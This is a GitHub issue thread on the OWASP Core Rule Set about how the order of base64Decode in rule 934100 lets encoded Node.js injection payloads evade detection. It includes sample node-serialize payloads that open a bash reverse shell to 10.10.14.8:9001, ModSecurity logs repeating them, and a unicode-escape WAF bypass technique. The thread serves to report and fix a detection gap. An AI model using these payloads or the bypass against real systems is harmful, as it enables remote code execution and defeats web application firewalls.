### ISSUE TITLE
Base64 Transform being at the end allows false negatives

### ISSUE THREAD

**Issue by IppSec** [coreruleset/coreruleset#3182]
### Description

Transforms are applied left to right, there are some attacks within: REQUEST-934-APPLICATION-ATTACK-GENERIC.conf that has base64decode at the end of the transforms.  Things like jsDecode should be applied after Base64 has been done, as the regex's which detect the attacks are based upon the plaintext string and not the base64'd version.

### How to reproduce the misbehavior 

If you base64 the following payloads and send it as a cookie, only the first one will get blocked.
```
{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec(\"bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'\", function(error, stdout, stderr) { console.log(stdout) })}()"}
{"rce":"_$$\u004e\u0044_FUNC$$_\u0066unction(){ require('child_process').exec(\"bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'\", function(error, stdout, stderr) { console.log(stdout) })}()"}
```

### Confirmation

Below is an example rule of placing base64 at the end of the transforms.  This was taken from:
```
SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx _(?:\$\$ND_FUNC\$\$_|_js_function)|(?:\beval|new[\s\v]+Function[\s\v]*)\(|String\.fromCharCode|function\(\)\{|this\.constructor|module\.exports=|\([\s\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\s\v]*\)|process(?:\.(?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?(?:\.call)?\(|binding|constructor|env|global|main(?:Module)?|process|require)|\[[\"'`](?:(?:a(?:ccess|ppendfile|rgv|vailability)|c(?:aveats|h(?:mod|own)|(?:los|opyfil)e|p|reate(?:read|write)stream)|ex(?:ec(?:file)?|ists)|f(?:ch(?:mod|own)|data(?:sync)?|s(?:tat|ync)|utimes)|inodes|l(?:chmod|ink|stat|utimes)|mkd(?:ir|temp)|open(?:dir)?|r(?:e(?:ad(?:dir|file|link|v)?|name)|m)|s(?:pawn(?:file)?|tat|ymlink)|truncate|u(?:n(?:link|watchfile)|times)|w(?:atchfile|rite(?:file|v)?))(?:sync)?|binding|constructor|env|global|main(?:Module)?|process|require)[\"'`]\])|(?:binding|constructor|env|global|main(?:Module)?|process|require)\[|console(?:\.(?:debug|error|info|trace|warn)(?:\.call)?\(|\[[\"'`](?:debug|error|info|trace|warn)[\"'`]\])|require(?:\.(?:resolve(?:\.call)?\(|main|extensions|cache)|\[[\"'`](?:(?:resolv|cach)e|main|extensions)[\"'`]\])" \
    "id:934100,\
    phase:2,\
    block,\
    capture,\
    t:none,t:urlDecodeUni,t:jsDecode,t:removeWhitespace,t:base64Decode,\
    msg:'Node.js Injection Attack 1/2',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-javascript',\
    tag:'platform-multi',\
    tag:'attack-rce',\
    tag:'attack-injection-generic',\
    tag:'paranoia-level/1',\
    tag:'OWASP_CRS',\
    tag:'capec/1000/152/242',\
    ver:'OWASP_CRS/4.0.0-rc1',\
    severity:'CRITICAL',\
    multiMatch,\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"```

**Comment by IppSec** [comment]
Whoops just realized there is an issue with this, will do a different pull request.  Need to urldecode before the base64

**Comment by IppSec** [comment]
The transform applies left to right, and in Javascript you can encode any character in unicode.  So the following strings will behave the same:
```
_$$ND_FUNC$$_function()
_$$\u004e\u0044_FUNC$$_\u0066unction()
```
While in Javascripts atob() function, you can use unicode in the base64 string itself 
```atob("\u0053GVsbG8gV29ybGQ=")```

The express app I was testing errored out anytime I attempted this.  That being said you can URL Encode (%53 instead of \u0053 in the above example), and it would still unbase64.  In my first commit, I put base64 at the start not realizing modsecurity then wouldn't be able to decode base64 if it was url encoded. Also, I don't think you can replace characters in a function (ex: $$ND_FUNC$$) with url encoded characters, unicode is a edge case/odd behavior.  So that is why I made the second commit that moved base64decode before jsdecode/remove whitespace.  Since I believe both of those transforms are supposed to be done on the PT string and not the b64 encoded one.

Could be wrong, admittedly this just comes from playing with a CTF that featured a modsecurity bypass.  The video of me talking about it is here: https://youtu.be/vsgPsMZx59w.  The part you want is probably around 25 minutes.

**Comment by RedXanadu** [comment]
For what it's worth, I am seeing rule 934100 match against both of the example payloads:

### Plain:

```> GET / HTTP/1.1
> Host: localhost
> User-Agent: test
> Accept: */*
> Cookie: PAYLOAD1={"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec(\"bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'\", function(error, stdout, stderr) { console.log(stdout) })}()"}
>

[Mon Apr 03 12:31:41.299815 2023]`
    [security2:error]
    [pid 35:tid 140347891521280]
    [client 172.18.0.1:37336]
    [client 172.18.0.1] ModSecurity: Warning. Pattern match "_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:\\\\beval|new[\\\\s\\\\v]+Function[\\\\s\\\\v]*)\\\\(|String\\\\.fromCharCode|function\\\\(\\\\)\\\\{|this\\\\.constructor|module\\\\.exports=|\\\\([\\\\s\\\\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\\\\s\\\\v]*\\\\)|process(?:\\\\.(?:(?:a(?:cces ..." at REQUEST_COOKIES:PAYLOAD1.
    [file "/etc/modsecurity.d/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf"]
    [line "72"]
    [id "934100"]
    [msg "Node.js Injection Attack 1/2"]
    [data "Matched Data: _$$ND_FUNC$$_ found within REQUEST_COOKIES:PAYLOAD1: {\\x22rce\\x22:\\x22_$$ND_FUNC$$_function(){ require('child_process').exec(\\x5c\\x22bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'\\x5c\\x22"]
    [severity "CRITICAL"]
    [ver "OWASP_CRS/4.0.0-rc1"]
    [tag "modsecurity"]
    [tag "application-multi"]
    [tag "language-javascript"]
    [tag "platform-multi"]
    [tag "attack-rce"]
    [tag "attack-injection-generic"]
    [tag "paranoia-level/1"]
    [tag "OWASP_CRS"]
    [tag "capec/1000/152/242"]
    [hostname "localhost"]
    [uri "/"]
    [unique_id "ZCrHLZAB4ckUL8hXVxZLvwAAAIA"]
[Mon Apr 03 12:31:41.300187 2023]
    [security2:error]
    [pid 35:tid 140347891521280]
    [client 172.18.0.1:37336]
    [client 172.18.0.1] ModSecurity: Warning. Pattern match "_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:\\\\beval|new[\\\\s\\\\v]+Function[\\\\s\\\\v]*)\\\\(|String\\\\.fromCharCode|function\\\\(\\\\)\\\\{|this\\\\.constructor|module\\\\.exports=|\\\\([\\\\s\\\\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\\\\s\\\\v]*\\\\)|process(?:\\\\.(?:(?:a(?:cces ..." at REQUEST_COOKIES:PAYLOAD1.
    [file "/etc/modsecurity.d/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf"]
    [line "72"]
    [id "934100"]
    [msg "Node.js Injection Attack 1/2"]
    [data "Matched Data: _$$ND_FUNC$$_ found within REQUEST_COOKIES:PAYLOAD1: {\\x22rce\\x22:\\x22_$$ND_FUNC$$_function(){ require('child_process').exec(\\x22bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'\\x22"]
    [severity "CRITICAL"]
    [ver "OWASP_CRS/4.0.0-rc1"]
    [tag "modsecurity"]
    [tag "application-multi"]
    [tag "language-javascript"]
    [tag "platform-multi"]
    [tag "attack-rce"]
    [tag "attack-injection-generic"]
    [tag "paranoia-level/1"]
    [tag "OWASP_CRS"]
    [tag "capec/1000/152/242"]
    [hostname "localhost"]
    [uri "/"]
    [unique_id "ZCrHLZAB4ckUL8hXVxZLvwAAAIA"]
[Mon Apr 03 12:31:41.300468 2023]
    [security2:error]
    [pid 35:tid 140347891521280]
    [client 172.18.0.1:37336]
    [client 172.18.0.1] ModSecurity: Warning. Pattern match "_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:\\\\beval|new[\\\\s\\\\v]+Function[\\\\s\\\\v]*)\\\\(|String\\\\.fromCharCode|function\\\\(\\\\)\\\\{|this\\\\.constructor|module\\\\.exports=|\\\\([\\\\s\\\\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\\\\s\\\\v]*\\\\)|process(?:\\\\.(?:(?:a(?:cces ..." at REQUEST_COOKIES:PAYLOAD1.
    [file "/etc/modsecurity.d/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf"]
    [line "72"]
    [id "934100"]
    [msg "Node.js Injection Attack 1/2"]
    [data "Matched Data: _$$ND_FUNC$$_ found within REQUEST_COOKIES:PAYLOAD1: {\\x22rce\\x22:\\x22_$$ND_FUNC$$_function(){require('child_process').exec(\\x22bash-c'bash-i>&/dev/tcp/10.10.14.8/90010>&1'\\x22"]
    [severity "CRITICAL"]
    [ver "OWASP_CRS/4.0.0-rc1"]
    [tag "modsecurity"]
    [tag "application-multi"]
    [tag "language-javascript"]
    [tag "platform-multi"]
    [tag "attack-rce"]
    [tag "attack-injection-generic"]
    [tag "paranoia-level/1"]
    [tag "OWASP_CRS"]
    [tag "capec/1000/152/242"]
    [hostname "localhost"]
    [uri "/"]
    [unique_id "ZCrHLZAB4ckUL8hXVxZLvwAAAIA"]
```

### Encoded:

```
> GET / HTTP/1.1
> Host: localhost
> User-Agent: test
> Accept: */*
> Cookie: PAYLOAD2={"rce":"_$$\u004e\u0044_FUNC$$_\u0066unction(){ require('child_process').exec(\"bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'\", function(error, stdout, stderr) { console.log(stdout) })}()"}
>

[Mon Apr 03 12:32:06.861083 2023]
    [security2:error]
    [pid 31:tid 140347560675072]
    [client 172.18.0.1:33420]
    [client 172.18.0.1] ModSecurity: Warning. Pattern match "_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:\\\\beval|new[\\\\s\\\\v]+Function[\\\\s\\\\v]*)\\\\(|String\\\\.fromCharCode|function\\\\(\\\\)\\\\{|this\\\\.constructor|module\\\\.exports=|\\\\([\\\\s\\\\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\\\\s\\\\v]*\\\\)|process(?:\\\\.(?:(?:a(?:cces ..." at REQUEST_COOKIES:PAYLOAD2.
    [file "/etc/modsecurity.d/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf"]
    [line "72"]
    [id "934100"]
    [msg "Node.js Injection Attack 1/2"]
    [data "Matched Data: ('child_process') found within REQUEST_COOKIES:PAYLOAD2: {\\x22rce\\x22:\\x22_$$\\x5cu004e\\x5cu0044_FUNC$$_\\x5cu0066unction(){ require('child_process').exec(\\x5c\\x22bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'\\x5c\\x22"]
    [severity "CRITICAL"]
    [ver "OWASP_CRS/4.0.0-rc1"]
    [tag "modsecurity"]
    [tag "application-multi"]
    [tag "language-javascript"]
    [tag "platform-multi"]
    [tag "attack-rce"]
    [tag "attack-injection-generic"]
    [tag "paranoia-level/1"]
    [tag "OWASP_CRS"]
    [tag "capec/1000/152/242"]
    [hostname "localhost"]
    [uri "/"]
    [unique_id "ZCrHRkcQJPwRFgKQdl94rAAAAEc"]
[Mon Apr 03 12:32:06.861394 2023]
    [security2:error]
    [pid 31:tid 140347560675072]
    [client 172.18.0.1:33420]
    [client 172.18.0.1] ModSecurity: Warning. Pattern match "_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:\\\\beval|new[\\\\s\\\\v]+Function[\\\\s\\\\v]*)\\\\(|String\\\\.fromCharCode|function\\\\(\\\\)\\\\{|this\\\\.constructor|module\\\\.exports=|\\\\([\\\\s\\\\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\\\\s\\\\v]*\\\\)|process(?:\\\\.(?:(?:a(?:cces ..." at REQUEST_COOKIES:PAYLOAD2.
    [file "/etc/modsecurity.d/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf"]
    [line "72"]
    [id "934100"]
    [msg "Node.js Injection Attack 1/2"]
    [data "Matched Data: _$$ND_FUNC$$_ found within REQUEST_COOKIES:PAYLOAD2: {\\x22rce\\x22:\\x22_$$ND_FUNC$$_function(){ require('child_process').exec(\\x22bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'\\x22"]
    [severity "CRITICAL"]
    [ver "OWASP_CRS/4.0.0-rc1"]
    [tag "modsecurity"]
    [tag "application-multi"]
    [tag "language-javascript"]
    [tag "platform-multi"]
    [tag "attack-rce"]
    [tag "attack-injection-generic"]
    [tag "paranoia-level/1"]
    [tag "OWASP_CRS"]
    [tag "capec/1000/152/242"]
    [hostname "localhost"]
    [uri "/"]
    [unique_id "ZCrHRkcQJPwRFgKQdl94rAAAAEc"]
[Mon Apr 03 12:32:06.861702 2023]
    [security2:error]
    [pid 31:tid 140347560675072]
    [client 172.18.0.1:33420]
    [client 172.18.0.1] ModSecurity: Warning. Pattern match "_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:\\\\beval|new[\\\\s\\\\v]+Function[\\\\s\\\\v]*)\\\\(|String\\\\.fromCharCode|function\\\\(\\\\)\\\\{|this\\\\.constructor|module\\\\.exports=|\\\\([\\\\s\\\\v]*[^0-9A-Z_a-z]child_process[^0-9A-Z_a-z][\\\\s\\\\v]*\\\\)|process(?:\\\\.(?:(?:a(?:cces ..." at REQUEST_COOKIES:PAYLOAD2.
    [file "/etc/modsecurity.d/owasp-crs/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf"]
    [line "72"]
    [id "934100"]
    [msg "Node.js Injection Attack 1/2"]
    [data "Matched Data: _$$ND_FUNC$$_ found within REQUEST_COOKIES:PAYLOAD2: {\\x22rce\\x22:\\x22_$$ND_FUNC$$_function(){require('child_process').exec(\\x22bash-c'bash-i>&/dev/tcp/10.10.14.8/90010>&1'\\x22"]
    [severity "CRITICAL"]
    [ver "OWASP_CRS/4.0.0-rc1"]
    [tag "modsecurity"]
    [tag "application-multi"]
    [tag "language-javascript"]
    [tag "platform-multi"]
    [tag "attack-rce"]
    [tag "attack-injection-generic"]
    [tag "paranoia-level/1"]
    [tag "OWASP_CRS"]
    [tag "capec/1000/152/242"]
    [hostname "localhost"]
    [uri "/"]
    [unique_id "ZCrHRkcQJPwRFgKQdl94rAAAAEc"]
```

**Comment by dune73** [comment]
We have discussed this at length in the project chat. Archived at https://github.com/coreruleset/project-chat-archive/blob/master/chat-archive-2023-04-03.md

The discussion starts at "19:21" in the archive.

Decision taken at: https://github.com/coreruleset/coreruleset/issues/3159#issuecomment-1494812544

**Comment by RedXanadu** [comment]
Hello again @IppSec,

Thanks for the further information and examples.

As mentioned above, we discussed this issue at our most recent team meeting.

We believe that our rules that are designed to handle Base64 encoded input should be adapted so that they handle **both** character encoding in the _encoded_ text (like your example of `\u0053GVsbG8gV29ybGQ=`) **and** character encoding in the _decoded_ text (like your example of performing Base64 decoding and then being left with `_$$\u004e\u0044_FUNC$$_\u0066unction()`).

We're going to look to amend the transformation pipelines of these rules (a handful of rules, I believe) to perform both pre- and post-Base64 decode character decoding. That should close this loophole.

**Comment by IppSec** [comment]
Thanks, what you said here would definitely close the loop hole

**Comment by RedXanadu** [comment]
This has now been fixed in: #3203.
